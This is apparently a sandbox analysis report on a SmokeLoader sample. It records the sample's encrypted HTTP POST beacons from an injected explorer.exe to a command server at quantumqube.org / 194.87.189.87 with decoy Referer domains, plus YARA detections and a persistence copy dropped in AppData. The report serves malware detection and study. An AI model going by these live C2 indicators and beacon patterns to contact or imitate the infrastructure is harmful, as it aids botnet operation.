                                                                                                                                    Oct 6, 2024 21:28:16.088781118 CEST11124OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 61 6e 68 7b 05 d5 0c 11 fc 0e 3e a4 cd 0b
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X83Xc2]Aaanh{>U4#gSkTC'U<E);ef_<wqn1N,WP1z+_0j9%"(T@0z$#/z[6Ev$s30Bo?
                                                                                                                                    Oct 6, 2024 21:28:16.092832088 CEST1236OUTData Raw: 66 94 d0 ac 88 e5 5f 55 8c f8 6c 15 ed 71 5b 7c e8 21 8f 2b c3 7e d5 25 0a ca c8 e4 8d cc 20 e7 34 d6 8e 78 a9 d1 06 5f 14 b8 88 56 0f f4 5b ea 65 99 c6 72 bf 71 d8 e0 8d 6a ab 10 68 20 7a 12 b3 64 af a1 6e 02 78 74 81 e3 c6 d2 cc be 10 dd 91 6f
                                                                                                                                    Data Ascii: f_Ulq[|!+~% 4x_V[erqjh zdnxtol'}F:uKw8'Vq2Pdc6tYSK:kj0X~Rx8cEGV8rARM@pf>7q-7RI
                                                                                                                                    Oct 6, 2024 21:28:16.093681097 CEST2472OUTData Raw: 1b 37 7e 6f 30 11 e6 42 c0 6f e5 cf ff 7f fc 3b 8f f8 d8 25 64 83 0c c3 45 93 8e ec 6d f6 49 7e 2b fb 29 0e f6 9f 5c 4c 06 6f 13 7b c7 06 6f c1 2b ad b2 58 04 28 91 54 ed b7 c2 68 e1 b1 c8 e8 27 fd 53 3f 45 30 ed 2c 4a cd 4f 17 73 24 99 fe 84 13
                                                                                                                                    Data Ascii: 7~o0Bo;%dEmI~+)\Lo{o+X(Th'S?E0,JOs$^?nFg1z_:Bx`1IX(%40K0tZ)%I+]2rN/_9>4=,rN/t4t##LpW"]'tT:_g^xIWaH
                                                                                                                                    Oct 6, 2024 21:28:16.093714952 CEST4944OUTData Raw: 3b 96 f3 ad ad db de 8f e2 31 51 ec 80 9f fe 10 f3 c6 ea 14 98 2f 63 52 14 79 c6 64 da 43 87 44 13 8f 02 8c 6d e9 ee c0 95 5b 8f 62 84 9f 85 de 67 e5 f4 5c 68 1a 07 18 c7 53 1a fa 4f 6b 1b b6 70 f0 5b 72 78 a4 c9 da fa 14 2e fe bd 9e 7b a3 fb a8
                                                                                                                                    Data Ascii: ;1Q/cRydCDm[bg\hSOkp[rx.{B1}\qQB%C,>3DN~Y)h2haX{w!^ 1NC2 8 2.N4]H~^T7<u#P+*E$}
                                                                                                                                    Oct 6, 2024 21:28:16.093743086 CEST2472OUTData Raw: 26 86 60 27 2c 52 81 71 45 10 dc 52 c5 82 28 4a c1 c3 79 17 4f 47 60 c6 ce 27 b7 21 66 14 7f 43 7a 82 11 3e be df e1 72 ac 54 67 04 65 6e 29 87 88 ca ad e2 50 80 5a 95 3c 3b 0d 52 4d e4 a9 62 11 86 6e 17 5a ba d0 57 42 1e 3c 98 2d b8 c2 58 cc af
                                                                                                                                    Data Ascii: &`',RqER(JyOG`'!fCz>rTgen)PZ<;RMbnZWB<-X|"^6%s+/{.QUA8cS[DzPG,?AhHXLX8I:4x|QHA>t!'Y"QR[wo%2Gqp
                                                                                                                                    Oct 6, 2024 21:28:16.093767881 CEST2472OUTData Raw: c5 2a fe 3c 5c 04 61 d3 8d a5 ba e0 8b dc b8 be ab c6 15 a8 8b ef b6 dc 2b aa 5e 4a de 58 de 29 13 2a 84 f8 df 84 2d df 0f 59 85 2e 68 f4 62 87 2d 49 a5 ec 63 64 03 d6 cb 4f 38 7a 6f 8b 39 bf e7 9c 8e 82 ec 5e f5 69 af fa 32 29 16 3b 16 69 99 96
                                                                                                                                    Data Ascii: *<\a+^JX)*-Y.hb-IcdO8zo9^i2);i"EZm+P*<M+9.thwLv*4nH!wk_uD&^_Xk5n_ht9$abEJ7[Hg|<ti0DB1
                                                                                                                                    Oct 6, 2024 21:28:16.093795061 CEST2472OUTData Raw: ca 1c 1c 6c 76 54 c9 9f df e6 30 69 5f ba d0 dd 16 99 ba 0b 5f e9 65 b9 cb 6b c7 b2 8a 46 a5 51 06 bb f8 20 c8 45 a6 59 a7 a4 7c d9 7b de ef 0a b9 70 a2 02 7a be 8d 91 8b 44 44 53 9a a5 03 32 0b 97 23 18 2f 4b 76 45 fb 1a 02 d0 8d 1e 21 0e 84 c3
                                                                                                                                    Data Ascii: lvT0i__ekFQ EY|{pzDDS2#/KvE!m-6vv.2Ur,b,<8g|u,>J"G]+`Ol|DaP}G_TY1U9JG]czh?t*;"U:lPzoU
                                                                                                                                    Oct 6, 2024 21:28:16.093822956 CEST4944OUTData Raw: 54 92 80 2e a0 c0 61 ac e7 b2 7c a6 88 3d 68 c0 31 a1 9e d1 04 99 26 ff 50 7e e2 1e 6f 50 c1 9a 7f 8c b0 c3 4b 30 76 86 8b 9f 8c 17 01 96 f6 37 08 3a dc 19 02 d7 bc e2 2b 3e f3 97 9b 82 30 98 2a 82 92 b4 68 46 ec d1 31 c8 e2 29 39 45 26 ce 60 3a
                                                                                                                                    Data Ascii: T.a|=h1&P~oPK0v7:+>0*hF1)9E&`:;([0z6@v7)?yQBx@)O/+7`:tD+H50(g@CYQ4P4&mq'?""5nK>h;W?* &UPO$-zod
                                                                                                                                    Oct 6, 2024 21:28:16.093907118 CEST2472OUTData Raw: d0 b5 c0 e0 9f c0 37 36 2f 61 93 dc 8f f4 03 dc 8e 06 72 45 c0 b8 91 b2 e1 0f ed cc 04 2e 31 70 6d 67 89 54 67 77 a9 35 44 41 82 b3 19 8a 1f 96 b2 f7 e4 2d 1d eb 09 0d ef c2 b6 9e 38 6b 28 f6 21 9d e0 24 7c c1 a5 22 23 61 99 cb 97 9c 9c 20 92 3e
                                                                                                                                    Data Ascii: 76/arE.1pmgTgw5DA-8k(!$|"#a ><Pl8uZeV^%'M^2n/l)VHdR5jI<RW9MsudqSf`%K_.ontC06k<&j
                                                                                                                                    Oct 6, 2024 21:28:16.097847939 CEST2472OUTData Raw: bb c7 a8 aa cc b1 4c 2a a5 c9 fe 6e 86 57 d8 91 08 74 2f ab 77 39 24 25 d0 fa 17 3c 73 0b 5c 29 98 45 7a ac 00 75 28 1d 08 48 77 79 cc 81 ca 53 8f 19 16 1d b9 12 6a 6c 28 38 26 69 51 da d1 ba dd b5 e1 28 fc 78 fd 39 37 ad f4 1e ca b8 04 e4 f7 7b
                                                                                                                                    Data Ascii: L*nWt/w9$%<s\)Ezu(HwySjl(8&iQ(x97{=dwiH<<E6$'{,"g'*wKWMSh}A|H?]T*d_Q[IrKt$[3']?fbVP-(mp1r
                                                                                                                                    Oct 6, 2024 21:28:16.719196081 CEST348INHTTP/1.1 413 Request Entity Too Large
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:28:16 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 183
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body><center><h1>413 Request Entity Too Large</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.849749194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:28:55.183792114 CEST283OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://wqvfywivxptqmt.org/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:28:55.183851957 CEST109OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
                                                                                                                                    Oct 6, 2024 21:28:55.994390011 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:28:55 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.849750194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:29:10.859481096 CEST281OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://raievqxnfbig.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:29:10.859503031 CEST109OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
                                                                                                                                    Oct 6, 2024 21:29:11.760560036 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:11 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    11192.168.2.849751194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:29:29.314513922 CEST284OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://vvywjtocjkatexf.net/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:29:29.314553022 CEST109OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
                                                                                                                                    Oct 6, 2024 21:29:30.176273108 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:30 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.849752194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:29:48.248104095 CEST280OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://mxfkxoyxtgh.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:29:48.248116970 CEST109OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
                                                                                                                                    Oct 6, 2024 21:29:48.979929924 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:29:48 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    13192.168.2.849753194.87.189.87804084C:\Windows\explorer.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Oct 6, 2024 21:30:05.055474997 CEST282OUTPOST /index.php HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Accept: */*
                                                                                                                                    Referer: http://qxdsgfawkutaw.com/
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Content-Length: 109
                                                                                                                                    Host: quantumqube.org
                                                                                                                                    Oct 6, 2024 21:30:05.055516005 CEST109OUTData Raw: 4f c3 20 0a 9d 0d 2d 7b 16 02 58 df 92 31 5e a6 82 b9 cb a6 b1 da 8a 12 42 7e cb 66 b6 1f c3 11 15 fa 12 33 70 5b bf 17 85 58 38 83 d1 4d 76 b5 5b 28 e5 bb 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 5d d3 8e 7d
                                                                                                                                    Data Ascii: O -{X1^B~f3p[X8Mv[(Xc2]aini{]}%C}J_'5$M4
                                                                                                                                    Oct 6, 2024 21:30:05.827975988 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:30:05 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0
                                                                                                                                    Oct 6, 2024 21:30:06.047552109 CEST235INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                    Date: Sun, 06 Oct 2024 19:30:05 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:15:26:06
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:15:26:11
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:15:26:31
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\hfetwhc, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:15:27:37
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:15:27:38
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:15:27:40
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:15:27:41
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:15:27:42
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:15:27:43
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:15:27:44
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    Imagebase:0x970000
                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:15:30:01
                                                                                                                                    Start date:06/10/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\hfetwhc
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:37'888 bytes
                                                                                                                                    MD5 hash:8E177D78AE583957804B5A933D6A3F1E
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:13.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:46.1%
                                                                                                                                      Total number of Nodes:128
                                                                                                                                      Total number of Limit Nodes:5
